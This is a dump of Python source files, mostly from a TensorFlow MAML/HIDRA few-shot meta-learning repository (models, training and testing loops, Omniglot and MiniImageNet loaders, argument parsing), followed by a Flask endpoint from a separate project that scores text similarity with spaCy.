= tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset1'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale1'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) weights['mean2'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance2'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset2'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale2'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) weights['mean3'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance3'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset3'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale3'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )""" print("Done Creating/loading Weights") return weights, cells def forward(self,x,weights, training): conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1") conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE) conv1 = tf.nn.relu(conv1) conv1 = tf.layers.MaxPooling2D(2,2)(conv1) conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2") conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE) conv2 = tf.nn.relu(conv2) conv2 = tf.layers.MaxPooling2D(2,2)(conv2) conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3") conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE) conv3 = tf.nn.relu(conv3) conv3 = tf.layers.MaxPooling2D(2,2)(conv3) conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4") conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE) conv4 = tf.nn.relu(conv4) conv4 = tf.layers.MaxPooling2D(2,2)(conv4) # print(conv4) # bn = tf.squeeze(conv4,axis=(1,2)) bn = tf.layers.Flatten()(conv4) # tf.reshape(bn, [3244,234]) fc1 = self.fc_layer(bn,"dense1",weights["d_1"],weights["b_1"]) # bn = tf.reshape(bn,[-1,]) return fc1
Python
87
57.298851
112
/archs/fcn.py
0.591994
0.559061
radrumond/hidra
refs/heads/master
import numpy as np import tensorflow as tf from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen import time def train( m, mt, # m is the model foir training, mt is the model for testing data_sampler, # Creates the data generator for training and testing min_classes, # minimum amount of classes max_classes, # maximum || || || train_shots, # number of samples per class (train) test_shots, # number of samples per class (test) meta_batch, # Number of tasks meta_iters, # Number of iterations test_iters, # Iterations in Test train_step, name): # Experiment name for experiments sess = tf.Session() sess.run(tf.global_variables_initializer()) # bnorms = [v for v in tf.global_variables() if "bn" in v.name] #---------Performance Tracking lists--------------------------------------- losses = [] temp_yp = [] temp_ypn= [] nls = [] aps = [] buffer = [] lossesB = [] #-------------------------------------------------------------------------- #---------Load train and test data-sets------------------------------------ train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"train") if mt is not None: test_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test" ) m.loadWeights(sess, name, step=str(int(train_step)), model_name=name+".ckpt") #-------------------------------------------------------------------------- #TRAIN LOOP print("Starting meta training:") start = time.time() for i in range(meta_iters): xb1,yb1,xb2,yb2 = next(train_gen) num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] if m.maml_n == 2: # in case it uses hydra master node, it should re-assign the output nodes from the master sess.run(m.init_assign, feed_dict={m.label_n:[5]}) l,_,vals,ps=sess.run([m.train_loss,m.meta_op,m.val_losses,m.val_predictions],feed_dict={m.train_xb: xb1, m.train_yb: yb1, m.val_xb:xb2, m.val_yb:yb2, m.label_n:num_l}) if m.maml_n == 2: # in case it uses hydra master node, it should update the master sess.run(m.final_assign,feed_dict={m.label_n:num_l}) losses.append(vals) lossesB.append(vals) buffer.append(l) #Calculate accuaracies aux = [] tmp_pred = np.argmax(np.reshape(ps[-1],[-1,num_l[0]]),axis=-1) tmp_true = np.argmax(np.reshape(yb2,[-1,num_l[0]]),axis=-1) for ccci in range(num_l[0]): tmp_idx = np.where(tmp_true==ccci)[0] #print(tmp_idx) aux.append(np.mean(tmp_pred[tmp_idx]==tmp_true[tmp_idx])) temp_yp.append(np.mean(tmp_pred==tmp_true)) temp_ypn.append(aux) #EVALUATE and PRINT if i%100==0: testString = "" #If we give a test model, it will test using the weights from train if mt is not None and i%1000==0: lossestest = [] buffertest = [] lossesBtest = [] temp_yptest = [] for z in range(100): if m.maml_n == 2: sess.run(mt.init_assign, feed_dict={mt.label_n:[5]}) xb1,yb1,xb2,yb2 = next(test_gen) num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] l,vals,ps=sess.run([mt.test_train_loss,mt.test_val_losses,mt.val_predictions],feed_dict={mt.train_xb: xb1, mt.train_yb: yb1, mt.val_xb:xb2, mt.val_yb:yb2, mt.label_n:num_l}) lossestest.append(vals) lossesBtest.append(vals) buffertest.append(l) temp_yptest.append(np.mean(np.argmax(ps[-1],axis=-1)==np.argmax(yb2,axis=-1))) testString = f"\n TEST: TLoss {np.mean(buffertest):.3f} VLoss {np.mean(lossesBtest,axis=0)[-1]:.3f}, ACCURACY {np.mean(temp_yptest):.4f}" print(f"Epoch {i}: TLoss {np.mean(buffer):.4f}, VLoss {np.mean(lossesB,axis=0)[-1]:.4f},", f"Accuracy {np.mean(temp_yp):.4}", f", Per label acc: {[float('%.4f' % elem) for elem in aux]}", f"Finished in {time.time()-start}s",testString) buffer = [] lossesB = [] temp_yp = [] start = time.time() # f"\n TRUE: {yb2}\n PRED: {ps}") if i%5000==0: print("Saving...") m.saveWeights(sess, name, i, model_name=name+".ckpt") m.saveWeights(sess, name, i, model_name=name+".ckpt")
Python
108
50.009258
162
/train.py
0.451988
0.439281
radrumond/hidra
refs/heads/master
# ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow import os import numpy as np import tensorflow as tf class MAML: def __init__(self,train_lr,meta_lr,image_shape, isMIN, label_size=2): self.train_lr = train_lr self.meta_lr = meta_lr self.image_shape = image_shape self.isMIN = isMIN self.saver = None self.label_size = label_size self.finals = 64 self.maml_n = 1 if isMIN: self.finals = 800 def build(self, K, meta_batchsz, mode='train'): # Meta batch of tasks self.train_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]]) self.train_yb = tf.placeholder(tf.float32, [None,None,None]) self.val_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]]) self.val_yb = tf.placeholder(tf.float32, [None,None,None]) self.label_n = tf.placeholder(tf.int32 , 1, name="num_labs") #Initialize weights self.weights, self.cells = self.dense_weights() training = True if mode is 'train' else False # Handle one task update def meta_task(inputs): train_x, train_y, val_x, val_y = inputs val_preds, val_losses = [], [] train_pred = self.forward(train_x, self.weights, training) train_loss = tf.losses.softmax_cross_entropy(train_y,train_pred) grads = tf.gradients(train_loss, list(self.weights.values())) gvs = dict(zip(self.weights.keys(), grads)) a=[self.weights[key] - self.train_lr * gvs[key] for key in self.weights.keys()] # for key in self.weights.keys(): # print(key, gvs[key]) fast_weights = dict(zip(self.weights.keys(),a)) # Validation after each update val_pred = self.forward(val_x, fast_weights, training) val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred) # record T0 pred and loss for meta-test val_preds.append(val_pred) val_losses.append(val_loss) # continue to build T1-TK steps graph for _ in range(1, K): # Update weights on train data of task t loss = tf.losses.softmax_cross_entropy(train_y,self.forward(train_x, fast_weights, training)) grads = tf.gradients(loss, list(fast_weights.values())) gvs = dict(zip(fast_weights.keys(), grads)) fast_weights = dict(zip(fast_weights.keys(), [fast_weights[key] - self.train_lr * gvs[key] for key in fast_weights.keys()])) # Evaluate validation data of task t val_pred = self.forward(val_x, fast_weights, training) val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred) val_preds.append(val_pred) val_losses.append(val_loss) result = [train_pred, train_loss, val_preds, val_losses] return result out_dtype = [tf.float32, tf.float32,[tf.float32] * K, [tf.float32] * K] result = tf.map_fn(meta_task, elems=(self.train_xb, self.train_yb, self.val_xb, self.val_yb), dtype=out_dtype, parallel_iterations=meta_batchsz, name='map_fn') train_pred_tasks, train_loss_tasks, val_preds_tasks, val_losses_tasks = result if mode is 'train': self.train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz self.val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)] self.val_predictions = val_preds_tasks optimizer = tf.train.AdamOptimizer(self.meta_lr, name='meta_optim') gvs = optimizer.compute_gradients(self.val_losses[-1]) gvs = [(tf.clip_by_norm(grad, 10), var) for grad, var in gvs] self.meta_op = optimizer.apply_gradients(gvs) else: self.test_train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz self.test_val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)] self.val_predictions = val_preds_tasks self.saving_weights = tf.trainable_variables() def conv_layer(self, x, W, b, name, strides=1): with tf.variable_scope(name,reuse=tf.AUTO_REUSE): x = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME') x = tf.nn.bias_add(x, b) return x def fc_layer(self,x, name, weights=None, biases=None): with tf.variable_scope(name,reuse=tf.AUTO_REUSE): fc = tf.matmul(x, weights) fc = tf.nn.bias_add(fc, biases) return fc def loadWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'): if self.saver == None: z = self.saving_weights #print("KEYS:", z.keys()) self.saver = tf.train.Saver(var_list=z, max_to_keep=12) saver = self.saver checkpoint_path = modeldir + f"{name}/"+model_name +"-" + step if os.path.isfile(checkpoint_path+".marker"): saver.restore(sess, checkpoint_path) print('The checkpoint has been loaded.') else: print(checkpoint_path+".marker not found. Starting from scratch.") def saveWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'): if self.saver == None: z = self.saving_weights self.saver = tf.train.Saver(var_list=z, max_to_keep=12) saver = self.saver checkpoint_path = modeldir + f"{name}/"+model_name if not os.path.exists(modeldir): os.makedirs(modeldir) saver.save(sess, checkpoint_path, global_step=step) print('The checkpoint has been created.') open(checkpoint_path+"-"+str(int(step))+".marker", 'a').close() def dense_weights(self): return def forward(self,x,weights, training): return
Python
136
44.830883
140
/archs/maml.py
0.579429
0.571406
radrumond/hidra
refs/heads/master
# ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow import numpy as np import tensorflow as tf from archs.maml2 import MAML def getBin(l=10): x_ = 2 n = 1 while x_ < l: x_ = x_* 2 n += 1 numbers = [] for i in range(l): num = [] for j in list('{0:0b}'.format(i+1).zfill(n)): num.append(int(j)) numbers.append(num) return numbers class Model(MAML): def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2): super().__init__(train_lr,meta_lr,image_shape,isMIN, label_size) self.finals = 64 if isMIN: self.finals = 800 def getBin(self, l=10): x_ = 2 n = 1 while x_ < l: x_ = x_* 2 n += 1 numbers = [] for i in range(l): num = [] for j in list('{0:0b}'.format(i+1).zfill(n)): num.append(int(j)) numbers.append(num) return numbers def dense_weights(self): weights = {} cells = {} initializer = tf.contrib.layers.xavier_initializer() divider = 1 inic = 1 filters = 64 self.finals = 64 if self.isMIN: print("\n\n\n\n\n\n\n\n\nIS MIN\n\n\n\n\n\n\n\n\n\n\n") divider = 2 inic = 3 self.finals = 800 filters = 32 with tf.variable_scope('MASTER', reuse= tf.AUTO_REUSE): cells['d_1'] = tf.get_variable('MASTER_d_1w', [self.finals,1], initializer = initializer) cells['b_1'] = tf.get_variable('MASTER_d_1b', [1], initializer=tf.initializers.constant) with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer) weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer) weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer) weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer) weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant) weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant) weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant) weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant) for i in range (self.max_labels): weights['d_1w'+str(i)] = tf.get_variable('d_1w'+str(i), [self.finals,1], initializer = initializer) weights['b_1w'+str(i)] = tf.get_variable('d_1b'+str(i), [1], initializer=tf.initializers.constant) return weights, cells def forward(self,x,weights, training): # with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1") conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE) conv1 = tf.nn.relu(conv1) conv1 = tf.layers.MaxPooling2D(2,2)(conv1) conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2") conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE) conv2 = tf.nn.relu(conv2) conv2 = tf.layers.MaxPooling2D(2,2)(conv2) conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3") conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE) conv3 = tf.nn.relu(conv3) conv3 = tf.layers.MaxPooling2D(2,2)(conv3) conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4") conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE) conv4 = tf.nn.relu(conv4) conv4 = tf.layers.MaxPooling2D(2,2)(conv4) bn = tf.layers.Flatten()(conv4) agg = [self.fc_layer(bn,"dense"+str(i),weights["d_1w"+str(i)],weights["b_1w"+str(i)]) for i in range(self.max_labels)] fc1 = tf.concat(agg, axis=-1)[:,:self.label_n[0]] return fc1
Python
102
41.862743
126
/archs/hydra.py
0.566102
0.533166
radrumond/hidra
refs/heads/master
import numpy as np import os import cv2 import pickle class MiniImgNet_Gen: def __init__(self,path="/tmp/data/miniimagenet",data_path=None): if data_path is None: self.path = path self.train_paths = ["train/"+x for x in os.listdir(path+"/train")] self.test_paths = ["test/"+x for x in os.listdir(path+"/test")] self.val_paths = ["val/"+x for x in os.listdir(path+"/val")] self.data_path = data_path self.meta_train = None self.meta_test = None self.meta_val = None def sample_Task(self,mb_size, min_class,max_class,train_size,test_size,training="train",shuffle=True): print('Loading MiniImagenet data...') if training == "train": if self.meta_train is None: meta_data = [] for idx,im_class in enumerate(self.train_paths): meta_data.append(np.array(loadImgDir(self.path+"/"+im_class,[84,84],rgb=True))) self.meta_train = meta_data else: meta_data = self.meta_train elif training == "val": if self.meta_val is None: meta_data = [] for idx,im_class in enumerate(self.val_paths): # print(idx) meta_data.append(np.array(loadImgDir(self.path+"/"+im_class,[84,84],rgb=True))) self.meta_val = meta_data else: meta_data = self.meta_val elif training == "test": if self.meta_test is None: meta_data = [] for idx,im_class in enumerate(self.test_paths): # print(idx) meta_data.append(np.array(loadImgDir(self.path+"/"+im_class,[84,84],rgb=True))) self.meta_test = meta_data else: meta_data = self.meta_test else: raise ValueError("Training needs to be train, val or test") print(f'Finished loading MiniImagenet data: {np.array(meta_data).shape}') if min_class < 2: raise ValueError("Minimum number of classes must be >=2") while True: meta_train_x = [] meta_train_y = [] meta_test_x = [] meta_test_y = [] # sample fixed number classes for a meta batch nr_classes = np.random.randint(min_class,max_class) for mb in range(mb_size): # select which classes in the meta batch classes = np.random.choice(range(len(meta_data)),nr_classes,replace=False) train_x = [] train_y = [] test_x = [] test_y = [] for label_nr,cl in enumerate(classes): images = np.random.choice(len(meta_data[cl]),train_size+test_size,False) train_imgs = images[:train_size] test_imgs = images[train_size:] train_x.append(meta_data[cl][train_imgs]) test_x.append(meta_data[cl][test_imgs]) train_y.append(np.ones(train_size)*label_nr) test_y.append(np.ones(test_size)*label_nr) train_x = np.array(train_x) train_y = np.eye(len(classes))[np.reshape(np.array(train_y),-1).astype(int)] test_x = np.array(test_x) test_y = np.eye(len(classes))[np.reshape(np.array(test_y),-1).astype(int)] train_x = np.reshape(train_x,[-1,84,84,3]) test_x = np.reshape(test_x,[-1,84,84,3]) if shuffle: train_x,train_y = unison_shuffled_copies(train_x,train_y) test_x,test_y = unison_shuffled_copies(test_x,test_y) meta_train_x.append(train_x) meta_train_y.append(train_y) meta_test_x.append(test_x) meta_test_y.append(test_y) # print('YIEEEEEEELDING') yield meta_train_x,meta_train_y,meta_test_x,meta_test_y # Initiates the Omniglot dataset and splits into meta train and meta task class OmniChar_Gen: def __init__(self,path="/tmp/data/omniglot",data_path=None,test_idx=None): self.path = path self.tasks = ["/images_background/"+x for x in os.listdir(path+"/images_background")]+["/images_evaluation/"+x for x in os.listdir(path+"/images_evaluation")] self.lens = {} for task in self.tasks: self.lens[task] = len(os.listdir(self.path+task)) self.meta_data = [] print("Loading Omniglot data") for idx,task in enumerate(range(len(self.tasks))): if idx%10==0: print(f"Loading tasks {idx}/{len(self.tasks)}") data = [] for char in os.listdir(self.path+self.tasks[task]): c = [] for img in os.listdir(self.path+self.tasks[task]+"/"+char): c.append(readImg(self.path+self.tasks[task]+"/"+char+"/"+img)) data.append(c) self.meta_data.append(data) self.meta_data = np.concatenate(self.meta_data) print("Finished loading data") if test_idx==None: self.train_idx = list(range(len(self.meta_data))) np.random.shuffle(self.train_idx) self.test_idx = self.train_idx[1200:] self.train_idx = self.train_idx[:1200] print("Test_idx:",self.test_idx) else: self.test_idx = test_idx self.train_idx = list(set(list(range(len(self.meta_data)))) - set(self.test_idx)) # Builds a generator that samples meta batches from meta training/test data def sample_Task(self,mb_size, min_class,max_class,train_size,test_size,training="train",shuffle=True): if training == "train": idx = self.train_idx elif training == "test": idx = self.test_idx else: raise ValueError("Omniglot only supports train and test for training param") if min_class < 2: raise ValueError("Minimum number of classes must be >=2") ## We can remove this later and make it dynamic while True: image_idx = idx.copy() np.random.shuffle(image_idx) meta_train_x = [] meta_train_y = [] meta_test_x = [] meta_test_y = [] # Roll number of classes in the mb nr_classes = np.random.randint(min_class,max_class) for task in range(mb_size): train_x = [] train_y = [] test_x = [] test_y = [] # Sample the characters for the task chars = np.random.choice(image_idx,nr_classes,False) # Sample the shots for each character for label_nr,char in enumerate(chars): images = np.random.choice(range(20),train_size+test_size,False) train_imgs = images[:train_size] test_imgs = images[train_size:] train_x.append(self.meta_data[char][train_imgs]) test_x.append(self.meta_data[char][test_imgs]) train_y.append(np.ones(train_size)*label_nr) test_y.append(np.ones(test_size)*label_nr) train_x = np.array(train_x) train_y = np.eye(len(chars))[np.reshape(np.array(train_y),-1).astype(int)] test_x = np.array(test_x) test_y = np.eye(len(chars))[np.reshape(np.array(test_y),-1).astype(int)] train_x = np.reshape(train_x,[-1,28,28,1]) test_x = np.reshape(test_x,[-1,28,28,1]) if shuffle: train_x,train_y = unison_shuffled_copies(train_x,train_y) test_x,test_y = unison_shuffled_copies(test_x,test_y) meta_train_x.append(train_x) meta_train_y.append(train_y) meta_test_x.append(test_x) meta_test_y.append(test_y) yield meta_train_x,meta_train_y,meta_test_x,meta_test_y def getOrder(minClass,maxClass,mb_size,number_chars=1200): # gives a list integers between minClass and maxClass that sum up to 1200, lens = [] sums = 0 while sums<=number_chars-minClass*mb_size: maxV = int((number_chars-sums)/mb_size)+1 n=np.random.randint(minClass,min(maxV,maxClass)) lens += [n]*mb_size sums = sums+(n*mb_size) return lens def readImg(path,size=[28,28],rgb=False): img = cv2.imread(path) img = cv2.resize(img,(size[0],size[1])).astype(float) if np.max(img)>1.0: img /= 255. if not rgb: return img[:,:,:1] else: if len(img.shape)==3: if img.shape[-1]!=3: print('ASFASFASFAS') print(img.shape) print(path) return img else: return np.reshape([img,img,img],[size[0],size[1],3]) def unison_shuffled_copies(a, b): assert len(a) == len(b) p = np.random.permutation(len(a)) return a[p], b[p] def loadImgDir(path,size,rgb): imgs = [] for img in os.listdir(path): imgs.append(readImg(path+"/"+img,size,rgb)) return imgs
Python
275
35.080002
166
/data_gen/omni_gen.py
0.499195
0.490342
radrumond/hidra
refs/heads/master
""" Command-line argument parsing. """ import argparse #from functools import partial import time import tensorflow as tf import json import os def boolean_string(s): if s not in {'False', 'True'}: raise ValueError('Not a valid boolean string') return s == 'True' def argument_parser(): """ Get an argument parser for a training script. """ file_time = int(time.time()) parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--arch', help='name architecture', default="fcn", type=str) parser.add_argument('--seed', help='random seed', default=0, type=int) parser.add_argument('--name', help='name add-on', type=str, default='Model_config-'+str(file_time)) parser.add_argument('--dataset', help='data set to evaluate on', type=str, default='Omniglot') parser.add_argument('--data_path', help='path to data folder', type=str, default='/home/') parser.add_argument('--config', help='json config file', type=str, default=None) parser.add_argument('--checkpoint', help='checkpoint directory', default='model_checkpoint') parser.add_argument('--test', help='Testing or Not', action='store_true') parser.add_argument('--testintrain', help='Testing during train or Not', action='store_true') parser.add_argument('--min_classes', help='minimum number of classes for n-way', default=2, type=int) parser.add_argument('--max_classes', help='maximum (excluded) number of classes for n-way', default=2, type=int) parser.add_argument('--ttrain_shots', help='number of examples per class in meta train', default=5, type=int) parser.add_argument('--ttest_shots', help='number of examples per class in meta test', default=15, type=int) parser.add_argument('--etrain_shots', help='number of examples per class in meta train', default=5, type=int) parser.add_argument('--etest_shots', help='number of examples per class in meta test', default=15, type=int) parser.add_argument('--train_inner_K', help='number of inner gradient steps during meta training', default=5, type=int) parser.add_argument('--test_inner_K', help='number of inner gradient steps during meta testing', default=5, type=int) parser.add_argument('--learning_rate', help='Adam step size for inner training', default=0.4, type=float) parser.add_argument('--meta_step', help='meta-training step size', default=0.01, type=float) parser.add_argument('--meta_batch', help='meta-training batch size', default=1, type=int) parser.add_argument('--meta_iters', help='meta-training iterations', default=70001, type=int) parser.add_argument('--eval_iters', help='meta-training iterations', default=2000, type=int) parser.add_argument('--step', help='Checkpoint step to load', default=59999, type=float) # python main_emb.py --meta_step 0.005 --meta_batch 8 --learning_rate 0.3 --test --checkpoint Model_config-1568818723 args = vars(parser.parse_args()) #os.system("mkdir -p " + args['checkpoint']) if args['config'] is None: args['config'] = f"{args['checkpoint']}/{args['name']}/{args['name']}.json" print(args['config']) # os.system("mkdir -p " + f"{args['checkpoint']}") os.system("mkdir -p " + f"{args['checkpoint']}/{args['name']}") with open(args['config'], 'w') as write_file: print("Json Dumping...") json.dump(args, write_file) else: with open(args['config'], 'r') as open_file: args = json.load(open_file) return parser def train_kwargs(parsed_args): """ Build kwargs for the train() function from the parsed command-line arguments. """ return { 'min_classes': parsed_args.min_classes, 'max_classes': parsed_args.max_classes, 'train_shots': parsed_args.ttrain_shots, 'test_shots': parsed_args.ttest_shots, 'meta_batch': parsed_args.meta_batch, 'meta_iters': parsed_args.meta_iters, 'test_iters': parsed_args.eval_iters, 'train_step' : parsed_args.step, 'name': parsed_args.name, } def test_kwargs(parsed_args): """ Build kwargs for the train() function from the parsed command-line arguments. """ return { 'eval_step' : parsed_args.step, 'min_classes': parsed_args.min_classes, 'max_classes': parsed_args.max_classes, 'train_shots': parsed_args.etrain_shots, 'test_shots': parsed_args.etest_shots, 'meta_batch': parsed_args.meta_batch, 'meta_iters': parsed_args.eval_iters, 'name': parsed_args.name, }
Python
97
50.051548
124
/args.py
0.616845
0.60715
radrumond/hidra
refs/heads/master
import numpy as np import tensorflow as tf from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen def test(m, data_sampler, eval_step, min_classes, max_classes, train_shots, test_shots, meta_batch, meta_iters, name): sess = tf.Session() sess.run(tf.global_variables_initializer()) losses=[] temp_yp = [] aps = [] buffer = [] lossesB=[] train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test") print("TEST MODE") m.loadWeights(sess, name, step = str(int(eval_step)), model_name=name+".ckpt") for i in range(meta_iters): xb1,yb1,xb2,yb2 = next(train_gen) num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] if m.maml_n == 2: sess.run(m.init_assign, feed_dict={m.label_n:[5]}) l,vals,ps=sess.run([m.test_train_loss,m.test_val_losses,m.val_predictions],feed_dict={m.train_xb: xb1, m.train_yb: yb1, m.val_xb:xb2, m.val_yb:yb2, m.label_n:num_l}) losses.append(vals) lossesB.append(vals) buffer.append(l) true_vals = np.argmax(yb2,axis=-1) all_accs = [] for pred_epoch in range(len(ps)): all_accs.append(np.mean(np.argmax(ps[pred_epoch],axis=-1)==true_vals)) temp_yp.append(all_accs) # if i%1==0: if i%50==0: print(f"({i}/{meta_iters})") print(f"Final: TLoss {np.mean(buffer)}, VLoss {np.mean(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}" ) print(f"Final: TLoss {np.mean(buffer)}-{np.std(buffer)}, VLoss {np.mean(lossesB,axis=0)}-{np.std(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}-{np.std(temp_yp,axis=0)}" )
Python
54
39.222221
184
/test.py
0.481822
0.469397
radrumond/hidra
refs/heads/master
## Created by Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen from archs.fcn import Model as mfcn from archs.hydra import Model as mhyd from train import * from test import * from args import argument_parser, train_kwargs, test_kwargs import random args = argument_parser().parse_args() random.seed(args.seed) t_args = train_kwargs(args) e_args = test_kwargs (args) print("########## argument sheet ########################################") for arg in vars(args): print (f"#{arg:>15} : {str(getattr(args, arg))} ") print("##################################################################") print("Loading Data...") if args.dataset in ["Omniglot", "omniglot", "Omni", "omni"]: loader = OmniChar_Gen (args.data_path) isMIN = False shaper = [28,28,1] elif args.dataset in ["miniimagenet", "MiniImageNet", "mini"]: loader = MiniImgNet_Gen(args.data_path) isMIN = True shaper = [84,84,3] else: raise ValueError("INVALID DATA-SET NAME!") print("Building Model...") if args.arch == "fcn"or args.arch == "maml": print("SELECTED: MAML") m = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) mt = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) #elif args.arch == "rnn": # m = mrnn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.min_classes) elif args.arch == "hydra" or args.arch == "hidra": print("SELECTED: HIDRA") m = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) mt = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) else: raise ValueError("INVALID Architecture NAME!") mode = "train" if args.test: mode = "test" print("Starting Test Step...") mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode=mode) test (mt, loader, **e_args) else: modeltest = None if args.testintrain: mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode="test") modeltest = mt print("Starting Train Step...") m.build (K = args.train_inner_K, meta_batchsz = args.meta_batch, mode=mode) train(m, modeltest, loader, **t_args)
Python
61
41.098362
133
/main.py
0.647975
0.641745
Rhaptos/Products.Lensmaker
refs/heads/master
from Products.Archetypes.public import StringWidget from Products.Archetypes.Registry import registerWidget class ColorWidget(StringWidget): _properties = StringWidget._properties.copy() _properties.update({ 'macro' : "colorchooser", }) registerWidget(ColorWidget, title='Color', description='Like StringWidget, stores the hex value of a color.', used_for=('Products.Archetypes.Field.StringField',) ) from Products.validation import validation from Products.validation.validators import RegexValidator validation.register(RegexValidator('isHexColor', r'^[0-9a-fA-F]{6}$', title='', description='', errmsg='is not a hexadecimal color code.'))
Python
21
34.333332
95
/widgets.py
0.685061
0.681023
tiwarim/PlagiarismCheck
refs/heads/master
# importing libraries from sys_utils import * # Resource Detect """ Resource Detect takes input on a POST protocol and returns similarity ratio     Parameters:      namepassimg: contains username, password of the user and two string documents <JSON>     Returns:         retJson: contains status code and message <JSON> """ class Detect(Resource): def post(self): namepasstext = request.get_json() username = namepasstext["username"] password = namepasstext["password"] text1 = namepasstext["text1"] text2 = namepasstext["text2"] if not userExists(username): retJson = { "statuscode" : 301, "message" : "User does not exit" } return jsonify(retJson) correct_pw = verifypw(username, password) if not correct_pw: retJson = { "statuscode" : 302, "message" : "Invalid password" } return jsonify(retJson) num_tokens = countTokens(username) if num_tokens <= 0 : retJson = { "statuscode" : 303, "message" : "Out of tokens, please refill" } return jsonify(retJson) # calculate edit distance. We use the pretained spacy model to predict the similarity of two strings goven to us nlp = spacy.load('en_core_web_sm') # loaded the spacy model text1 = nlp(text1) # change from string to natural language processing model sentence text2 = nlp(text2) # ratio of similarity between 0 and 1 for the text1 and text2. closer the one, more the similarity # 0 = text1 and text2 are very different and 1 = text1 and text2 are almost or entirely similar ratio = text1.similarity(text2) retJson = { "statuscode" : 200, "message" : "Similarity ration calculated", "similarity ratio" : ratio } users.update({ "username":username, }, { "$set": { "tokens" : num_tokens -1 } } ) return jsonify(retJson)
Python
69
31.072464
120
/src/Backend/web/Detect.py
0.554903
0.539539
